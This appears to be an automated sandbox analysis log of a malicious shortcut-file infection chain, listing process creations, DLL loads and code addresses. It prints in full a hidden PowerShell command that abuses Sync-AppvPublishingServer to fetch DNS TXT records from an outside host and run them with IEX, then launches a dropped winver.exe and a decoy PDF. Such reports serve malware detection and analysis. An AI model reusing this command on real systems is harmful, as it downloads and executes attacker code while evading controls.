Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1720,i,1813560832827388052,3977061367603789960,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Tasks\winver.exe "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings \| IEX}	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c start "" "C:\Windows\Tasks\62rgx9T9MW.pdf"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Tasks\winver.exe "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Windows\Tasks\62rgx9T9MW.pdf"	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1720,i,1813560832827388052,3977061367603789960,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Tasks\winver.exe	Section loaded: wsock32.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: winmm.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: mpr.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: wininet.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: userenv.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: mscoree.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: wldp.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: amsi.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: profapi.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: msasn1.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: sspicli.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: mswsock.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: secur32.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: schannel.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: gpapi.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: rasman.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: rtutils.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: winhttp.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: winnsi.dll
Source: C:\Windows\Tasks\winver.exe	Section loaded: wbemcomn.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: alyemenione.lnk

LNK file: ..\..\..\Windows\System32\wscript.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings \| IEX}
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings \| IEX}			Jump to behavior

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D8040CC LoadLibraryA,GetProcAddress,

11_2_00007FF63D8040CC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B7F8405 push eax; ret	1_2_00007FFD9B7F846D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B7F782E pushad ; iretd	1_2_00007FFD9B7F785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B7F5A7C push ebx; iretd	1_2_00007FFD9B7F5ACA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B7F5ACB push ebx; iretd	1_2_00007FFD9B7F5ACA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B7F8169 push ebx; ret	1_2_00007FFD9B7F816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B7F5CFA push ebx; iretd	1_2_00007FFD9B7F5D8A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B7F785E push eax; iretd	1_2_00007FFD9B7F786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B7F00AD pushad ; iretd	1_2_00007FFD9B7F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C7BCD push edx; ret	1_2_00007FFD9B8C7C12
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C63F5 push edx; ret	1_2_00007FFD9B8C6432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C77F9 push edx; ret	1_2_00007FFD9B8C77FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C001C push edx; ret	1_2_00007FFD9B8C0062
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C3019 push edx; ret	1_2_00007FFD9B8C301A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C5019 push edx; ret	1_2_00007FFD9B8C501A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C0004 push edx; ret	1_2_00007FFD9B8C001A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C0001 push edx; ret	1_2_00007FFD9B8C0002
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C2424 push edx; ret	1_2_00007FFD9B8C2442
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C5C51 push edx; ret	1_2_00007FFD9B8C5C52
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C8C3D push edx; ret	1_2_00007FFD9B8C8C82
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8C1F69 push edx; ret	1_2_00007FFD9B8C1F6A
